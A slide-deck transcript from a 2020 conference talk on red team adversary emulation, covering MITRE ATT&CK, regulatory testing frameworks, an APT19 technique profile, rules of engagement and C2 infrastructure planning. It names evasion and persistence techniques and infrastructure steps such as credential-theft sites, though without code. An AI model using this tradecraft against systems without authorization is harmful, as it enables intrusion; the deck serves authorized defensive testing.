SlideShare a Scribd company logo

Adversary Emulation - Red Team Village - Mayhem 2020

Jorge Orchilles
Jorge Orchilles

Jorge Orchilles is an experienced red team leader who has led offensive security assessments for large financial institutions. The document discusses adversary emulation, which involves the red team emulating realistic adversary tactics, techniques, and procedures to obtain access to an organization. This helps evaluate an organization's preparedness against sophisticated attacks. It describes measuring how people, processes, and technologies prevent or detect the red team's activities to identify areas for improvement.

Technology
1 of 27
Adversary Emulation JORGE ORCHILLES
#WHOAMILed offensive security team at large financial for past 10 years Published industry contributions include: ⑊ Founding member MITRE Engenuity Center ⑊ Co-Author GFMA Threat-led Penetration Testing & Red Team Framework ⑊ SANS Instructor and author of Red Team course: SEC564 ⑊ NSI Technologist Fellow; ISSA Fellow ⑊ Common Vulnerability Scoring System (CVSSv3.1) ⑊ Author of Windows 7 Administrators reference (Syngress) @JORGEORCHILLES
3 VULNERABILITY SCANNING VULNERABILITY ASSESSMENT PENETRATION TESTING RED TEAM IN PERSON PURPLE TEAM CONTINOUS PURPLE TEAM ADVERSARY EMULATION Definition: A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective like those of realistic adversary. Goal: Emulate an end-to-end attack against a target organization. Obtain a holistic view of the organization’s preparedness for a real, sophisticated attack. @JORGEORCHILLES
4 An end to end assessment of the entire organization ⑊ Main differentiator from penetration testing - Tests the defenders not the defenses (detection vs. prevention) - People, Process, and Technology - Not a limited scope test targeting just a particular product, infrastructure, network, application, URL, or domain ⑊ Full Cyber Kill Chain from Recon to Objective ⑊ Often blind, unannounced exercise ⑊ Determine what TTPs would work, undetected if a true attack occurred and action plan to remediate @JORGEORCHILLES
5 Measuring the effectiveness of People, Process, and Technology Documented metrics and timeline of entire exercise ⑊ Time and TTPs to obtain initial access ⑊ TTPs that allowed moving laterally ⑊ Identify TTPs not prevented or detected ⑊ Process and time to escalate events into an incident ⑊ Time to contain ⑊ Time to eradicate ⑊ Process to engage hunt team, coordinate communications, alert leadership and correlate all events and realize sophisticated, targeted attack @JORGEORCHILLES
6 ASSUMPTIONS That attack won’t work here because… “We applied all patches” “We have outbound DLP” “Our users would never open a macro” “Our applications have MFA” “Our network is segmented and only way out is through proxy” “We have firewalls, AV, and IDS” Trust but verify Can the Iranians breach us? @JORGEORCHILLES
7 Training and improving the Blue Team ⑊ Every Red Team Exercise will result in Blue Team getting better ⑊ As you measure the people, process, and technology you will see improvements ⑊ Lessons will be learned, and processes improved ⑊ The more you train, the more you improve @JORGEORCHILLES
8 FRAMEWORK & METHODOLOGIES ⑊ Cyber Kill Chain – Lockheed Martin ⑊ Unified Cyber Kill Chain – Paul Pols ⑊ ATT&CK – MITRE Regulatory ⑊ CBEST Intelligence Led Testing – Bank of England ⑊ Threat Intelligence-Based Ethical Red Teaming – TIBER-EU ⑊ Red Team: Adversarial Attack Simulation Exercises – ABS (Association of Banks of Singapore) ⑊ intelligence-led Cyber Attack Simulation Testing (iCAST) – HKMA (Hong Kong Monetary Authority) ⑊ G-7 Fundamental Elements for Threat-Led Penetration Testing (G7FE-TLPT) ⑊ A Framework for the Regulatory Use of Penetration Testing and Red Teaming in the Financial Services Industry – GFMA (Global Financial Markets Association) @JORGEORCHILLES
INITIAL ACCESS EXECUTION PERSISTENCE PRIVILEGE ESCALATION DEFENSIVE EVASION CREDENTIAL ACCESS DISCOVERY LATERAL MOVEMENT COLLECTION COMMAND AND CONTROL EXFILTRATION IMPACT DRIVE- BY COMPROMISE APPLESCRIPT .BASH_PROFULE AND .BASHRC ACCESS TOKEN MANIPULATION ACCESS TOKEN MANIPULATION ACCOUNT MANIPULATION ACCOUNT DISCOVERY APPLESCRIPT AUDIO CAPTURE COMMONLY USED PORT AUTOMATED EXFILTRATION DATA DESTRUCTION EXPLOIT PUBLIC- FACING APPLICATION CMSTP ACCESIBILITY FEATURES ACCESIBILITY FEATURES BITS JOBS BASH HISTORY APPLICATION WINDOW DISCOVERY APPLICATION DEPLOYMENT SOFTWARE AUTOMATED COLLECTION COMMUINICTION THROUGH REMOVABLE DATA DATA COMPRESSED DATA ENCRYPTED FOR IMPACT EXTERNAL REMOTE SERVICES COMMAND-LINE INTERFACE ACCOUNT MANIPULATION APPCERT DLLS DINARY PADDING BRUTE FORCE BROWSER BOOKMARK DISCOVERY DISTRUBETED COMPONENT OBJECT MODEL CLIPBOARD DATA CONNECTION PROXY DATA ENCRYPTED DEFACEMENT HARDWARE ADDITIONS COMPILED HTML FILE APPCERT DLLS APPINIT DLLS ACCOUNT CONTROL BYPASS USER CREDENTIAL DUMPING DOMAIN TRUST DISCOVERY EXPLOITATION OF REMOTE SERVICES DATA STAGE CUSTOM COMMAND AND CONTROL PROTOCOL DATA TRANSFER SIZE LIMIT DISK CONTENT WIPE REPLICATION THROUGH REMOVABLE MEDIA CONTORL PANEL ITEMS APPINIT DLLS APPLICATION SHIMMIMG CMSTP CREDENTIALS IN FILES FILE AND DIRECTORY DISCOVERY LOGON SCRIPT DATA FROM INFORMATION REPOSITORIES CUSTOM CRYPTOGRAPHIC PROTOCOL EXFILTRATION OVER ALTERNATIVE PROTOCOL DISK STRUCTURE WIPE SPEARPHISHING ATTACHMENT DYNAMIC DATA EXCHANGE APPLICATION SHIMMING BYPASS USER ACCOUNT CONTROL CLEAR COMMAND HISTORY CREDENTIALS IN REGISTRY NETWORK SERVICE SCANNING PASS THE HASH DATA FROM LOCAL SYSTEM DATA ENCODING EXFILTRATION OVER COMMAND AND CONTROL CHANNEL ENDPOINT DENIAL OF SERVICE SPEARPHISHING LINK EXECUTION THROUGH API AUTHENTICATION PACKAGE DLL SEARCH ORDER HIJACKING CODE SIGNING EXPLOITATION FOR CREDENTIAL ACCESS NETWORK SHARE DISCOVERY PASS THE TICKET DATA FROM NETWORK SHARE DRIVE DATA OBFUSCATION EXFILTRATION OVER OTHER NETWORK MEDIUM FIRMWARE CORRUPTION MITRE has developed the ATT&CK Matrix as a central repository for adversary TTPs. It is used by both red and blue teams. It is rapidly gaining traction as a de facto standard! @JORGEORCHILLES
FRAMEWORK Most organizations will take a hybrid approach based on the frameworks and methodologies just introduced ⑊ Threat Intelligence ⑊ Planning ⑊ Testing ⑊ Closure @JORGEORCHILLES
T1086 – PowerShell T1068 – Exploitation for Privilege Escalation T1003 – Credential Dumping S0194 – PowerSploit S0192 – Pupy S0002 – Mimikatz S0129 – AutoIT Hash Value IP Address TACTICS | TECHNIQUES | PROCEDURES https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html @JORGEORCHILLES
ATT&CK Navigator
@JORGEORCHILLES Category Description Description APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. Goal and Intent Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks. Command and Control Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server Initial Access Spearphishing attachment (T1193); Spearphishing link (T1192) Execution PowerShell (T1086); User Execution; Hidden Windows (T1143) - used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073) Discovery System Owner/User Discovery (T1033); System Information Discovery (T1082) System Network Configuration Discovery (T1016) Persistence Registry Run Keys/ Start up Folder (T1060) - establishes persistence by setting the Registry key HKCUSoftwareMicrosoftWindowsCurrentVersionRun Defense Evasion Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques
14 TRUSTED AGENTS RULES OF ENGAGEMENT ATTACK INFRASTRUCTURE o Limited number of people with knowledge of the exercise o When players find out about exercise their behavior changes o Individuals whose daily roles and responsibilities put them in a position to contribute to reducing the risk of causing unintended impact to production systems and/or inaccurate senior or external escalation Establish the responsibility, relationship, and guidelines between Trusted Agents and Players o Rules for Blue Team o Carry out all activity as any other incident o Trusted Agents will report what incidents are being investigated o Do not report exercise related items to regulators o Rules for Red Team o Do not bring down any business process or operation o Communicate all actions during daily brief Red Team is responsible for setting up infrastructure to emulate TTPs o Choose and procure external hosting service providers o Purchase domain names o Generate domain certificates o Setup mail servers o Setup phishing and credential theft sites o Confirm reputation and categorization of all domain and IPs o Setup Short and Long Haul C2 infrastructure o Configure custom C2 tooling o Test external C2 communication PLANNING @JORGEORCHILLES White Team or White Cell
15 Matrix of command and control frameworks for Red Teamers ⑊ Google doc of most C2 frameworks: www.thec2matrix.com ⑊ Documents various capabilities of each framework ⑊ There is no right or wrong, better or worse framework ⑊ Find ideal C2 for your current objective ⑊ Wizard like UI to select which one: ask.thec2matrix.com ⑊ How-To Site for using C2s: howto.thec2matrix.com ⑊ SANS Slingshot C2 Matrix Edition @JORGEORCHILLES
Let’s do it Live! @JORGEORCHILLES
20
21 VULNERABILITY SCANNING VULNERABILITY ASSESSMENT PENETRATION TESTING RED TEAM Emulate APT19 with Empire3 & Starkiller https://howto.thec2matrix.com/c2/empire#red-team-village-mayhem-demo-of-apt19 @JORGEORCHILLES
22 ⑊ What TTPs were prevented? Why? Document these too! ⑊ What was detected? How long did it take? - Time to contain - Time to eradicate ⑊ Where processes followed? - Process and time to escalate events into an incident - Process to engage hunt team - Process to coordinate communications & alert leadership - Process to corelate all events and realize sophisticated, targeted attack CLOSURE @JORGEORCHILLES
24
25
Threat Catalog Cyber Threat Intelligence Emulation Plan C2 Server & Reports for the Business MITRE ATT&CK Production Automated Emulation Initial Access https://medium.com/@jorgeorchilles/purple-team-exercise-tools-a85187ce341 ⑊ Red Team will be asked to repeat TTPs ⑊ Don’t waste Red Team Operator time re- doing the same TTP while engineers, operations, and SOC get detection working
Thank you! Q & A?@JorgeOrchilles @C2_Matrix https://www.thec2matrix.com/ https://www.sans.org/sec564

Recommended

Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
Jorge Orchilles
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpCon
Jorge Orchilles
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix
Jorge Orchilles
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 
Purple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConPurple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMCon
Jorge Orchilles
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Jorge Orchilles
 
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Digit Oktavianto
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
Haydn Johnson
 

Recommended

Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
Jorge Orchilles
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpCon
Jorge Orchilles
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix
Jorge Orchilles
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 
Purple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConPurple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMCon
Jorge Orchilles
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Jorge Orchilles
 
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Digit Oktavianto
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
Haydn Johnson
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
Jorge Orchilles
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
Erik Van Buggenhout
 
Automating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorAutomating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections Collector
MITRE ATT&CK
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Jorge Orchilles
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018
Christopher Korban
 
Purple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatPurple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHat
Jorge Orchilles
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
MITRE ATT&CK
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
Erik Van Buggenhout
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEF
Jorge Orchilles
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE - ATT&CKcon
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
MITRE ATT&CK
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE - ATT&CKcon
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamer
Jorge Orchilles
 
State of the ATT&CK
State of the ATT&CKState of the ATT&CK
State of the ATT&CK
MITRE ATT&CK
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK Philharmonic
MITRE ATT&CK
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
Katie Nickels
 
The ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookThe ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT Playbook
MITRE ATT&CK
 
RED-TEAM_Conclave
RED-TEAM_ConclaveRED-TEAM_Conclave
RED-TEAM_Conclave
NSConclave
 
Cap gemini pitch
Cap gemini pitchCap gemini pitch
Cap gemini pitch
Nicolas Consigny
 

More Related Content

What's hot

Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
Jorge Orchilles
 
Automating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorAutomating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections Collector
MITRE ATT&CK
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Jorge Orchilles
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
MITRE ATT&CK
 
Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEF
Jorge Orchilles
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
MITRE ATT&CK
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK Philharmonic
MITRE ATT&CK
 
The ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookThe ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT Playbook
MITRE ATT&CK
 

What's hot (20)

Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
Automating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorAutomating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections Collector
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018
 
Purple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatPurple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHat
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEF
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamer
 
State of the ATT&CK
State of the ATT&CKState of the ATT&CK
State of the ATT&CK
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK Philharmonic
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
 
The ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookThe ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT Playbook
 

Similar to Adversary Emulation - Red Team Village - Mayhem 2020

Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Harry McLaren
 
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDFSeven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Tor Cannady
 
Running Head Security Assessment Repot (SAR) .docx
Running Head Security Assessment Repot (SAR) .docxRunning Head Security Assessment Repot (SAR) .docx
Running Head Security Assessment Repot (SAR) .docx
SUBHI7
 
Are you ready for the next attack? reviewing the sp security checklist (apnic...
Are you ready for the next attack? reviewing the sp security checklist (apnic...Are you ready for the next attack? reviewing the sp security checklist (apnic...
Are you ready for the next attack? reviewing the sp security checklist (apnic...
Barry Greene
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Joe Vest
 

Similar to Adversary Emulation - Red Team Village - Mayhem 2020 (20)

RED-TEAM_Conclave
RED-TEAM_ConclaveRED-TEAM_Conclave
RED-TEAM_Conclave
 
Cap gemini pitch
Cap gemini pitchCap gemini pitch
Cap gemini pitch
 
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
 
Purple Team Use Case - Security Weekly
Purple Team Use Case - Security WeeklyPurple Team Use Case - Security Weekly
Purple Team Use Case - Security Weekly
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
 
Evolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV ConferenceEvolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV Conference
 
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDFSeven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
 
Running Head Security Assessment Repot (SAR) .docx
Running Head Security Assessment Repot (SAR) .docxRunning Head Security Assessment Repot (SAR) .docx
Running Head Security Assessment Repot (SAR) .docx
 
External Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersExternal Threat Hunters are Red Teamers
External Threat Hunters are Red Teamers
 
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerDEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
 
Democratization - New Wave of Data Science (홍운표 상무, DataRobot) :: AWS Techfor...
Democratization - New Wave of Data Science (홍운표 상무, DataRobot) :: AWS Techfor...Democratization - New Wave of Data Science (홍운표 상무, DataRobot) :: AWS Techfor...
Democratization - New Wave of Data Science (홍운표 상무, DataRobot) :: AWS Techfor...
 
Are you ready for the next attack? Reviewing the SP Security Checklist
Are you ready for the next attack? Reviewing the SP Security ChecklistAre you ready for the next attack? Reviewing the SP Security Checklist
Are you ready for the next attack? Reviewing the SP Security Checklist
 
Are you ready for the next attack? reviewing the sp security checklist (apnic...
Are you ready for the next attack? reviewing the sp security checklist (apnic...Are you ready for the next attack? reviewing the sp security checklist (apnic...
Are you ready for the next attack? reviewing the sp security checklist (apnic...
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
FS-ISAC 2019 - Building an Effective Red Team Program 07/08/2019
FS-ISAC 2019 - Building an Effective Red Team Program 07/08/2019FS-ISAC 2019 - Building an Effective Red Team Program 07/08/2019
FS-ISAC 2019 - Building an Effective Red Team Program 07/08/2019
 
Mitre ATT&CK by Mattias Almeflo Nixu
Mitre ATT&CK by Mattias Almeflo NixuMitre ATT&CK by Mattias Almeflo Nixu
Mitre ATT&CK by Mattias Almeflo Nixu
 
Building an Analytics - Enabled SOC Breakout Session
Building an Analytics - Enabled SOC Breakout Session Building an Analytics - Enabled SOC Breakout Session
Building an Analytics - Enabled SOC Breakout Session
 
The Next Generation of Security Operations Centre (SOC)
The Next Generation of Security Operations Centre (SOC)The Next Generation of Security Operations Centre (SOC)
The Next Generation of Security Operations Centre (SOC)
 
Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...
 

More from Jorge Orchilles

SCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzSCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim Schulz
Jorge Orchilles
 
C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020
Jorge Orchilles
 
Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020
Jorge Orchilles
 
Blackhat 2020 Arsenal - C2 Matrix
